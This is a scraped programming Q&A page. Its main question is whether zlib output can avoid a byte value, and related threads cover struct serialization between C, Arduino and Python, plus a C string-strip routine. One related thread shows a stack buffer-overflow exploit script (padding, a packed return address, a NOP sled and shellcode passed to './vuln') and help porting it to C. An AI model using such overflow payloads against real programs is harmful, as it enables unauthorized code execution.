Can zlib compressed output avoid using certain byte value? - python

It seems that the output of zlib.compress uses all possible byte values. Is this possible to use 255 of 256 byte values (for example avoid using \n)?
Note that I just use the python manual as a reference, but the question is not specific to python (i.e. any other languages that has a zlib library).

No, this is not possible. Apart from the compressed data itself, there is standardized control structures which contain integers. Those integers may accidentially lead to any 8-bit character ending up in the bytestream.
Your only chance would be to encode the zlib bytestream into another format, e.g. base64.

The whole point of compression is to reduce the size as much as possible. If zlib or any compressor only used 255 of the 256 byte values, the size of the output would be increased by at least 0.07%.
That may be perfectly fine for you, so you can simply post-process the compressed output, or any data at all, to remove one particular byte value at the expense of some expansion. The simplest approach would be to replace that byte when it occurs with a two-byte escape sequence. You would also then need to replace the escape prefix with a different two-byte escape sequence. That would expand the data on average by 0.8%. That is exactly what Hans provided in another answer here.
If that cost is too high, you can do something more sophisticated, which is to decode a fixed Huffman code that encodes 255 symbols of equal probability. To decode you then encode that Huffman code. The input is a sequence of bits, not bytes, and most of the time you will need to pad the input with some zero bits to encode the last symbol. The Huffman code turns one symbol into seven bits and the other 254 symbols into eight bits. So going the other way, it will expand the input by a little less than 0.1%. For short messages it will be a little more, since often less than seven bits at the very end will be encoded into a symbol.
Implementation in C:
// Placed in the public domain by Mark Adler, 26 June 2020.
// Encode an arbitrary stream of bytes into a stream of symbols limited to 255
// values. In particular, avoid the \n (10) byte value. With -d, decode back to
// the original byte stream. Take input from stdin, and write output to stdout.
#include <stdio.h>
#include <string.h>
// Encode arbitrary bytes to a sequence of 255 symbols, which are written out
// as bytes that exclude the value '\n' (10). This encoding is actually a
// decoding of a fixed Huffman code of 255 symbols of equal probability. The
// output will be on average a little less than 0.1% larger than the input,
// plus one byte, assuming random input. This is intended to be used on
// compressed data, which will appear random. An input of all zero bits will
// have the maximum possible expansion, which is 14.3%, plus one byte.
int nolf_encode(FILE *in, FILE *out) {
unsigned buf = 0;
int bits = 0, ch;
do {
if (bits < 8) {
ch = getc(in);
if (ch != EOF) {
buf |= (unsigned)ch << bits;
bits += 8;
}
else if (bits == 0)
break;
}
if ((buf & 0x7f) == 0) {
buf >>= 7;
bits -= 7;
putc(0, out);
continue;
}
int sym = buf & 0xff;
buf >>= 8;
bits -= 8;
if (sym >= '\n' && sym < 128)
sym++;
putc(sym, out);
} while (ch != EOF);
return 0;
}
// Decode a sequence of symbols from a set of 255 that was encoded by
// nolf_encode(). The input is read as bytes that exclude the value '\n' (10).
// Any such values in the input are ignored and flagged in an error message.
// The sequence is decoded to the original sequence of arbitrary bytes. The
// decoding is actually an encoding of a fixed Huffman code of 255 symbols of
// equal probability.
int nolf_decode(FILE *in, FILE *out) {
unsigned long lfs = 0;
unsigned buf = 0;
int bits = 0, ch;
while ((ch = getc(in)) != EOF) {
if (ch == '\n') {
lfs++;
continue;
}
if (ch == 0) {
if (bits == 0) {
bits = 7;
continue;
}
bits--;
}
else {
if (ch > '\n' && ch <= 128)
ch--;
buf |= (unsigned)ch << bits;
}
putc(buf, out);
buf >>= 8;
}
if (lfs)
fprintf(stderr, "nolf: %lu unexpected line feeds ignored\n", lfs);
return lfs != 0;
}
// Encode (no arguments) or decode (-d) from stdin to stdout.
int main(int argc, char **argv) {
if (argc == 1)
return nolf_encode(stdin, stdout);
else if (argc == 2 && strcmp(argv[1], "-d") == 0)
return nolf_decode(stdin, stdout);
fputs("nolf: unknown options (use -d to decode)\n", stderr);
return 1;
}

As #ypnos says, this isn't possible within zlib itself. You mentioned that base64 encoding is too inefficient, but it's pretty easy to use an escape character to encode a character you want to avoid (like newlines).
This isn't the most efficient code in the world (and you might want to do something like finding the least used bytes to save a tiny bit more space), but it's readable enough and demonstrates the idea. You can losslessly encode/decode, and the encoded stream won't have any newlines.
def encode(data):
# order matters
return data.replace(b'a', b'aa').replace(b'\n', b'ab')
def decode(data):
def _foo():
pair = False
for b in data:
if pair:
# yield b'a' if b==b'a' else b'\n'
yield 97 if b==97 else 10
pair = False
elif b==97: # b'a'
pair = True
else:
yield b
return bytes(_foo())
As some measure of confidence you can check this exhaustively on small bytestrings:
from itertools import *
all(
bytes(p) == decode(encode(bytes(p)))
for c in combinations_with_replacement(b'ab\nc', r=6)
for p in permutations(c)
)

Related

C++ byte array (struct) interpreted by Python

I am trying to pass a C++ struct from my arduino to my raspberry pi. I have a struct that looks like this:
struct node_status
{
char *node_type = "incubator";
char *sub_type; // set the type of incubator
int sub_type_id;
bool sleep = false; // set to sleep
int check_in_time = 1000; // set check in time
bool LOCK = false; // set if admin control is true/false
} nodeStatus;
I tried using the python module named struct
from struct import *
print("Rcvd Node Status msg from 0{:o}".format(header.from_node))
print("node_type: {}".format(unpack("10s",payload[0]))) #node_type
node_type = unpack("10s",payload[0])
print("sub_type: {}".format(unpack("10s",payload[1]), header.from_node)) #sub_type
sub_type = unpack("10s",payload[1])
print("sub_type_id: {}".format(unpack("b",payload[2])))
sub_type_id = unpack("b",payload[2])
print("sleep: {}".format(unpack("?",payload)[3])) #sleep
sleep = unpack("?",payload[3])
print("check_in_time: {}".format(unpack("l",payload[4]))) #check_in_time
check_in_time = unpack("l",payload[4])
print("Lock: {}".format(unpack("?",payload[5]))) #LOCK
Lock = unpack("?",payload[5])
but I am not having much luck. I was even looking at just using ctypes module but seem to not be going anywhere..
from ctypes import *
class interpret_nodes_status(Structure):
_fields_ = [('node_type',c_char_p),
('sub_type',c_char_p),
('sub_type_id',c_int),
('sleep',c_bool),
(check_in_time',c_int),
('LOCK',c_bool)]
nodestatus = translate_nodes_status(payload)
but that just gives me an error
TypeError: bytes or integer address expected instead of bytearray instance
What can I do? WHERE am I going wrong with this?
EDIT:
I am using the RF24Mesh Library from
https://github.com/nRF24/RF24Mesh
The way I send the message is this?
RF24NetworkHeader header();
if (!mesh.write(&nodeStatus, /*type*/ 126, sizeof(nodeStatus), /*to node*/ 000))
{ // Send the data
if ( !mesh.checkConnection() )
{
Serial.println("Renewing Address");
mesh.renewAddress();
}
}
else
{
Serial.println("node status msg Sent");
return;
}
}
Your C program is just sending the struct, but the struct doesn't contain any of the string data. It only includes pointers (addresses) which are not usable by any other process (different address spaces).
You would need to determine a way to send all the required data, which would likely mean sending the length of each string and its data.
One way to do that would be to use a maximum length and just store the strings in your struct:
struct node_status
{
char node_type[48];
char sub_type[48]; // set the type of incubator
int sub_type_id;
bool sleep = false; // set to sleep
int check_in_time = 1000; // set check in time
bool LOCK = false; // set if admin control is true/false
} nodeStatus;
You would then need to copy strings into those buffers instead of assigning them, and check for buffer overflow. If the strings are ever entered by users, this has security implications.
Another approach is to pack the data into a single block just when you send it.
You could use multiple writes, as well, but I don't know this mesh library or how you would set the type parameter to do that. Using a buffer is something like:
// be sure to check for null on your strings, too.
int lennodetype = strlen(nodeStatus.node_type);
int lensubtype = strlen(nodeStatus.sub_type);
int bufsize = sizeof(nodeStatus) + lennodetype + lensubtype;
byte* buffer = new byte[bufsize];
int offset = 0;
memcpy(buffer+offset, &lennodetype, sizeof(int));
offset += sizeof(int);
memcpy(buffer+offset, nodeStatus.node_type, lennodetype * sizeof(char));
offset += lennodetype * sizeof(char);
memcpy(buffer+offset, &lensubtype, sizeof(int));
offset += sizeof(int);
memcpy(buffer+offset, nodeStatus.sub_type, lensubtype * sizeof(char));
offset += lensubtype * sizeof(char);
// this still copies the pointers, which aren't needed, but simplifies the code
// and 8 unused bytes shouldn't matter too much. You could adjust this line to
// eliminate it if you wanted.
memcpy(buffer+offset, &nodeStatus, sizeof(nodeStatus));
if (!mesh.write(buffer,
/*type*/ 126,
bufsize,
/*to node*/ 000))
{ // Send the data
if ( !mesh.checkConnection() )
{
Serial.println("Renewing Address");
mesh.renewAddress();
}
}
else
{
Serial.println("node status msg Sent");
}
delete [] buffer;
Now that the data is actually SENT (a prerequisite for reading the data) the data you need should all be in the payload array. You will need to unpack it, but you can't just pass unpack a single byte, it needs the array:
len = struct.unpack("#4i", payload)
offset = 4
node_type = struct.unpack_from("{}s".format(len), payload, offset)
offset += len
len = struct.unpack_from("#4i", payload, offset)
offset += 4
sub_type = struct.unpack_from("{}s".format(len), payload, offset)
offset += len
...
I upvoted Garr Godfrey's answer as it is a good one indeed. However, it will increase the struct's size. This neither a good nor bad thing, however if for some reason you would like to keep the solution based on char* pointers instead of arrays (e.g. you don't know the maximum length of the strings), it can be achieved the following way (my code makes assumption of int's size being 4 bytes, little endian, bool's size=1bytes, char size=1byte):
//_Static_assert(sizeof(int)==4u, "Int size has to be 4 bytes");
//the above one is C11, the one below is C++:
//feel free to ifdef that if you need it
static_assert(sizeof(int)==4u, "Int size has to be 4 bytes");
struct node_status
{
char* node_type;
char* sub_type; // set the type of incubator
int sub_type_id;
bool sleep; // set to sleep
int check_in_time; // set check in time
bool LOCK; // set if admin control is true/false
};
size_t serialize_node_status(const struct node_status* st, char* buffer)
{
//this bases on the assumption buffer is large enough
//and string pointers are not null
size_t offset=0u;
size_t l = 0;
l = strlen(st->node_type)+1;
memcpy(buffer+offset, st->node_type, l);
offset += l;
l = strlen(st->sub_type)+1;
memcpy(buffer+offset, st->sub_type, l);
offset += l;
l = sizeof(st->sub_type_id);
memcpy(buffer+offset, &st->sub_type_id, l);
offset += l;
l = sizeof(st->sleep);
memcpy(buffer+offset, &st->sleep, l);
offset += l;
l = sizeof(st->check_in_time);
memcpy(buffer+offset, &st->check_in_time, l);
offset += l;
l = sizeof(st->LOCK);
memcpy(buffer+offset, &st->LOCK, l);
offset += l;
return offset;
// sending:
char buf[100] = {0}; //pick the needed size or allocate it dynamically
struct node_status nodeStatus = {"abcz", "x", 20, true, 999, false};
size_t serialized_bytes = serialize_node_status(&nodeStatus, buf);
mesh.write(buf, /*type*/ 126, serialized_bytes, /*to node*/ 000);
Side note: assigning string literals directly to char pointers is not valid C++.
So the string types either should be const char*, e.g. const char* node_type or the file should be compiled as C (where you can get away with it). Arduino often tends to have its own compilation options set, so it is likely to work due to compiler extension (or just inhibited warning). Thus, not being sure what exactly is going to be used, I wrote a C11-compatible version.
And then on Python's end:
INT_SIZE=4
class node_status:
def __init__(self,
nt: str,
st: str,
stid: int,
sl: bool,
cit: int,
lck: bool):
self.node_type = nt
self.sub_type = st
self.sub_type_id = stid
self.sleep = sl
self.check_in_time = cit
self.LOCK = lck
def __str__(self):
s=f'node_type={self.node_type} sub_type={self.sub_type}'
s+=f' sub_type_id={self.sub_type_id} sleep={self.sleep}'
s+=f' check_in_time={self.check_in_time} LOCK={self.LOCK}'
return s;
#classmethod
def from_bytes(cls, b: bytes):
offset = b.index(0x00)+1
nt = str(b[:offset], 'utf-8')
b=b[offset:]
offset = b.index(0x00)+1
st = str(b[:offset], 'utf-8')
b=b[offset:]
stid = int.from_bytes(b[:INT_SIZE], 'little')
b = b[INT_SIZE:]
sl = bool(b[0])
b = b[1:]
cit = int.from_bytes(b[:INT_SIZE], 'little')
b = b[INT_SIZE:]
lck = bool(b[0])
b = b[1:]
assert(len(b) == 0)
return cls(nt, st, stid, sl, cit, lck)
#and the deserialization goes like this:
fromMesh1 = bytes([0x61,0x62,0x63,0x0,0x78,0x79,0x7A,0x0,0x14,0x0,0x0,0x0,0x1,0xE7,0x3,0x0,0x0,0x1])
fromMesh2 = bytes([0x61,0x62,0x63,0x0,0x78,0x79,0x7A,0x0,0x14,0x0,0x0,0x0,0x1,0xE7,0x3,0x0,0x0,0x0])
fromMesh3 = bytes([0x61,0x62,0x63,0x7A,0x0,0x78,0x0,0x14,0x0,0x0,0x0,0x1,0xE7,0x3,0x0,0x0,0x0])
print(node_status.from_bytes(fromMesh1))
print(node_status.from_bytes(fromMesh2))
print(node_status.from_bytes(fromMesh3))
These are all good answers but not what was required. I suppose a more in depth knowledge of the RF24Mesh library was needed. I have been able to find the answer with the help of some RF24 pro's. Here is my solution:
I had to change the struct to specific sizes using char name[10] on the C++ arduino side.
struct node_status
{
char node_type[10] = "incubator";
char sub_type[10] = "chicken"; // set the type of incubator
int sub_type_id = 1;
bool sleep = false; // set to sleep
int check_in_time = 1000; // set check in time
bool LOCK = false; // set if admin control is true/false
} nodeStatus;
Unfortunately, it looks like read() returns the payload with a length of what you passed to the read() function. This is unintuitive and should be improved. Not to mention, the parameter specifying the length of the payload to return should be optional.
Until they get a fix for this, I will have to slice the payload to only the length that struct.pack() needs (which can be determined based on the format specifier string). So, basically
# get the max sized payload despite what was actually received
head, payload = network.read(144)
# unpack 30 bytes
(
node_type,
sub_type,
sub_type_id,
sleep,
check_in_time,
LOCK,
) = struct.unpack("<10s10si?i?", payload[:30])
I finally got it to work using this method. I want to be fair about giving the points and would like to have your opinion on who should get them that was closest to this method. Please comment below.

Converting Python program to C: How can I multiply a character by a specified value and store it into a variable?

in need of general help with converting a small buffer overflow script in Python to C. It's a bit of hack job and I am struggling to get the data types right. I can compile everything with only a single warning: "initialization makes pointer from integer without a cast - char *buff = ("%0*i", 252, 'A');"
This line is supposed to give the variable buff the value of 252 'A' characters.
I know that changing the data type can fix this, but the rest of the program relies on overflow being a pointer char *.
If anyone has any tips for me regarding any parts of the program they would be greatly appreciated.
cheers, Shiv
ORIGINAL Python:
stack_addr = 0xbffff1d0
rootcode = "\x31"
def conv(num):
return struct.pack("<I",num)
buff = "A" * 172
buff += conv(stack_addr)
buff += "\x90" * 30
buff += rootcode
buff += "A" * 22
print "targetting vulnerable program"
call(["./vuln", buff])
Converted C code:
//endianess convertion
int conv(int stack_addr)
{
(stack_addr>>8) | (stack_addr<<8);
return(0);
}
int main(int argc, char *argv[])
{
int stack_addr = 0xbffff1d0;
int rootcode = *"\x31"
char *buff = ("%0*i", 252, 'A'); //give buff the value of 252 'A's
buff += conv(stack_addr); //endian conversion
buff += ("%0*i", 30, '\x90'); //append buff variable with 30 '\x90'
buff = buff + rootcode; //append buff with value of rootcode variable
buff += ("%0*i", 22, 'A'); //append buff with 22 'A's
}
The easiest way it to write a string with the needed number of characters manually. Use the copy-paste feature of your favourite text editor.
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
You can also build it from individual characters, using a for-loop, as described below. However, you can skip the part with building a long string, and append individual characters directly to the final string. This can be done in two ways: using strcat and without using strcat. The first way is a little cleaner:
char buff[400] = ""; // note: this should be an array, not a pointer!
// the array should be big enough to hold the final string; 400 seems enough
for (int i = 0; i < 252; i++)
strcat(buff, "A"); // this part appends one string of length 1
The function strcat is inefficient; it calculates the length of the string each time you append the string "A" to it. You don't need speed, but if you ever decide to write it efficiently, don't use strcat, and append individual char (bytes) to the array using core C language:
char buff[400]; // note: this should be an array, not a pointer!
int pos = 0; // position at which to write data
for (int i = 0; i < 252; i++)
buff[pos++] = 'A'; // this part appends one char 'A'; note single quotes
...
buff[pos++] = '\0'; // don't forget to terminate the string!

How to unpack a C-style structure inside another structure?

I am receiving data via socket interface from an application (server) written in C. The data being posted has the following structure. I am receiving data with a client written in Python.
struct hdr
{
int Id;
char PktType;
int SeqNo;
int Pktlength;
};
struct trl
{
char Message[16];
long long info;
};
struct data
{
char value[10];
double result;
long long count;
short int valueid;
};
typedef struct
{
struct hdr hdr_buf;
struct data data_buf[100];
struct trl trl_buf;
} trx_unit;
How do I unpack the received data to access my inner data buffer?
Using the struct library is the way to go. However, you will have to know a bit more about the C program that is serializing the data. Consider the hdr structure. If the C program is sending it using the naive approach:
struct hdr header;
send(sd, &hdr, sizeof(header), 0);
Then your client cannot safely interpret the bytes that are sent to it because there is an indeterminate amount of padding inserted between the struct members. In particular, I would expect three bytes of padding following the PktType member.
The safest way to approach sending around binary data is to have the server and client serialize the bytes directly to ensure that there is no additional padding and to make the byte ordering of multibyte integers explicit. For example:
/*
* Send a header over a socket.
*
* The header is sent as a stream of packed bytes with
* integers in "network" byte order. For example, a
* header value of:
* Id: 0x11223344
* PktType: 0xff
* SeqNo: 0x55667788
* PktLength: 0x99aabbcc
*
* is sent as the following byte stream:
* 11 22 33 44 ff 55 66 77 88 99 aa bb cc
*/
void
send_header(int sd, struct hdr const* header)
{ /* NO ERROR HANDLING */
uint32_t num = htonl((uint32_t)header->Id);
send(sd, &num, sizeof(num), 0);
send(sd, &header->PktType, sizeof(header->PktType), 0);
num = htonl((uint32_t)header->SeqNo);
send(sd, &num, sizeof(num), 0);
num = htonl((uint32_t)header->PktLength);
send(sd, &num, sizeof(num), 0);
}
This will ensure that your client can safely decode it using the struct module:
buf = s.recv(13) # packed data is 13 bytes long
id_, pkt_type, seq_no, pkt_length = struct.unpack('>IBII', buf)
If you cannot modify the C code to fix the serialization indeterminacy, then you will have to read the data from the stream and figure out where the C compiler is inserting padding and manually build struct format strings to match using the padding byte format character to ignore padding values.
I usually write a decoder class in Python that reads a complete value from the socket. In your case it would look something like:
class PacketReader(object):
def __init__(self, sd):
self._socket = sd
def read_packet(self):
id_, pkt_type, seq_no, pkt_length = self._read_header()
data_bufs = [self._read_data_buf() for _ in range(0, 100)]
message, info = self._read_trl()
return {'id': id_, 'pkt_type': pkt_type, 'seq_no': seq_no,
'data_bufs': data_bufs, 'message': message,
'info': info}
def _read_header(self):
"""
Read and unpack a ``hdr`` structure.
:returns: a :class:`tuple` of the header data values
in order - *Id*, *PktType*, *SeqNo*, and *PktLength*
The header is assumed to be packed as 13 bytes with
integers in network byte order.
"""
buf = self._socket.read(13)
# > Multibyte values in network order
# I Id as 32-bit unsigned integer value
# B PktType as 8-bit unsigned integer value
# I SeqNo as 32-bit unsigned integer value
# I PktLength as 32-bit unsigned integer value
return struct.unpack('>IBII', buf)
def _read_data_buf(self):
"""
Read and unpack a single ``data`` structure.
:returns: a :class:`tuple` of data values in order -
*value*, *result*, *count*, and *value*
The data structure is assumed to be packed as 28 bytes
with integers in network byte order and doubles encoded
as IEEE 754 binary64 in network byte order.
"""
buf = self._socket.read(28) # assumes double is binary64
# > Multibyte values in network order
# 10s value bytes
# d result encoded as IEEE 754 binary64 value
# q count encoded as a 64-bit signed integer
# H valueid as a 16-bit unsigned integer value
return struct.unpack('>10sdqH', buf)
def _read_trl(self):
"""
Read and unpack a ``trl`` structure.
:returns: a :class:`tuple` of trl values in order -
*Message* as byte string, *info*
The structure is assumed to be packed as 24 bytes with
integers in network byte order.
"""
buf = self.socket.read(24)
# > Multibyte values in network order
# 16s message bytes
# q info encoded as a 64-bit signed value
return struct.unpack('>16sq', buf)
Mind you that this is untested and probably contains syntax errors but that is how I would approach the problem.
The struct library has all you need to do this.

collecting 'double' type data from arduino

I'm trying to send floating point data from arduino to python.The data is sent as 8 successive bytes of data (size of double) followed by newline character ('\n').How to collect these successive bytes and convert it to proper format at python end (system end)
void USART_transmitdouble(double* d)
{
union Sharedblock
{
char part[sizeof(double)];
double data;
}my_block;
my_block.data = *d;
for(int i=0;i<sizeof(double);++i)
{
USART_send(my_block.part[i]);
}
USART_send('\n');
}
int main()
{
USART_init();
double dble=5.5;
while(1)
{
USART_transmitdouble(&dble);
}
return 0;
}
python code.Sure this wouldn't print the data in proper format but just want to show what i have tried.
import serial,time
my_port = serial.Serial('/dev/tty.usbmodemfa131',19200)
while 1:
print my_port.readline(),
time.sleep(0.15)
Update:
my_ser = serial.Serial('/dev/tty.usbmodemfa131',19200)
while 1:
#a = raw_input('enter a value:')
#my_ser.write(a)
data = my_ser.read(5)
f_data, = struct.unpack('<fx',data)
print f_data
#time.sleep(0.5)
Using struct module as shown in the above code is able to print float values. But,
50% of the time,the data is printed correctly.But if I mess with time.sleep() or stop the transmission and restart it,incorrect values are printed out.I guess the wrong set of 4 bytes are being unpacked in this case.Any idea on what we can do here??
On Arduino, a double is the same as float, i.e. a little-endian single-precision floating-point number that occupies 4 bytes of memory. This means that you should read exactly 5 bytes, use the little-endian variant of the f format to unpack it, and ignore the trailing newline with x:
import struct
...
data = my_port.read(5)
num, = struct.unpack('<fx', data)
Note that you don't want to use readline because any byte of the representation of the floating-point number can be '\n'.
As Nikklas B. pointed out, you don't even need to bother with the newline at all, just send the 4 bytes and read as many from Python. In that case the format string will be '<f'.

Mimic Python's strip() function in C

I started on a little toy project in C lately and have been scratching my head over the best way to mimic the strip() functionality that is part of the python string objects.
Reading around for fscanf or sscanf says that the string is processed upto the first whitespace that is encountered.
fgets doesn't help either as I still have newlines sticking around.
I did try a strchr() to search for a whitespace and setting the returned pointer to '\0' explicitly but that doesn't seem to work.
Python strings' strip method removes both trailing and leading whitespace. The two halves of the problem are very different when working on a C "string" (array of char, \0 terminated).
For trailing whitespace: set a pointer (or equivalently index) to the existing trailing \0. Keep decrementing the pointer until it hits against the start-of-string, or any non-white character; set the \0 to right after this terminate-backwards-scan point.
For leading whitespace: set a pointer (or equivalently index) to the start of string; keep incrementing the pointer until it hits a non-white character (possibly the trailing \0); memmove the rest-of-string so that the first non-white goes to the start of string (and similarly for everything following).
There is no standard C implementation for a strip() or trim() function. That said, here's the one included in the Linux kernel:
char *strstrip(char *s)
{
size_t size;
char *end;
size = strlen(s);
if (!size)
return s;
end = s + size - 1;
while (end >= s && isspace(*end))
end--;
*(end + 1) = '\0';
while (*s && isspace(*s))
s++;
return s;
}
If you want to remove, in place, the final newline on a line, you can use this snippet:
size_t s = strlen(buf);
if (s && (buf[s-1] == '\n')) buf[--s] = 0;
To faithfully mimic Python's str.strip([chars]) method (the way I interpreted its workings), you need to allocate space for a new string, fill the new string and return it. After that, when you no longer need the stripped string you need to free the memory it used to have no memory leaks.
Or you can use C pointers and modify the initial string and achieve a similar result.
Suppose your initial string is "____forty two____\n" and you want to strip all underscores and the '\n'
____forty two___\n
^ ptr
If you change ptr to the 'f' and replace the first '_' after two with a '\0' the result is the same as Python's "____forty two____\n".strip("_\n");
____forty two\0___\n
^ptr
Again, this is not the same as Python. The string is modified in place, there's no 2nd string and you cannot revert the changes (the original string is lost).
I wrote C code to implement this function. I also wrote a few trivial tests to make sure my function does sensible things.
This function writes to a buffer you provide, and should never write past the end of the buffer, so it should not be prone to buffer overflow security issues.
Note: only Test() uses stdio.h, so if you just need the function, you only need to include ctype.h (for isspace()) and string.h (for strlen()).
// strstrip.c -- implement white space stripping for a string in C
//
// This code is released into the public domain.
//
// You may use it for any purpose whatsoever, and you don't need to advertise
// where you got it, but you aren't allowed to sue me for giving you free
// code; all the risk of using this is yours.
#include <ctype.h>
#include <stdio.h>
#include <string.h>
// strstrip() -- strip leading and trailing white space from a string
//
// Copies from sIn to sOut, writing at most lenOut characters.
//
// Returns number of characters in returned string, or -1 on an error.
// If you get -1 back, then nothing was written to sOut at all.
int
strstrip(char *sOut, unsigned int lenOut, char const *sIn)
{
char const *pStart, *pEnd;
unsigned int len;
char *pOut;
// if there is no room for any output, or a null pointer, return error!
if (0 == lenOut || !sIn || !sOut)
return -1;
pStart = sIn;
pEnd = sIn + strlen(sIn) - 1;
// skip any leading whitespace
while (*pStart && isspace(*pStart))
++pStart;
// skip any trailing whitespace
while (pEnd >= sIn && isspace(*pEnd))
--pEnd;
pOut = sOut;
len = 0;
// copy into output buffer
while (pStart <= pEnd && len < lenOut - 1)
{
*pOut++ = *pStart++;
++len;
}
// ensure output buffer is properly terminated
*pOut = '\0';
return len;
}
void
Test(const char *s)
{
int len;
char buf[1024];
len = strstrip(buf, sizeof(buf), s);
if (!s)
s = "**null**"; // don't ask printf to print a null string
if (-1 == len)
*buf = '\0'; // don't ask printf to print garbage from buf
printf("Input: \"%s\" Result: \"%s\" (%d chars)\n", s, buf, len);
}
main()
{
Test(NULL);
Test("");
Test(" ");
Test(" ");
Test("x");
Test(" x");
Test(" x ");
Test(" x y z ");
Test("x y z");
}
This potential ‘solution' is by no means as complete or thorough as others have presented. This is for my own toy project in C - a text-based adventure game that I’m working on with my 14-year old son. If you’re using fgets() then strcspn() may just work for you as well. The sample code below is the beginning of an interactive console-based loop.
#include <stdio.h>
#include <string.h> // for strcspn()
int main(void)
{
char input[64];
puts("Press <q> to exit..");
do {
printf("> ");
fgets(input,64,stdin); // fgets() captures '\n'
input[strcspn(input, "\n")] = 0; // replaces '\n' with 0
if (input[0] == '\0') continue;
printf("You entered '%s'\n", input);
} while (strcmp(input,"q")!= 0); // returns 0 (false) when input = "q"
puts("Goodbye!");
return 0;
}

Categories

Resources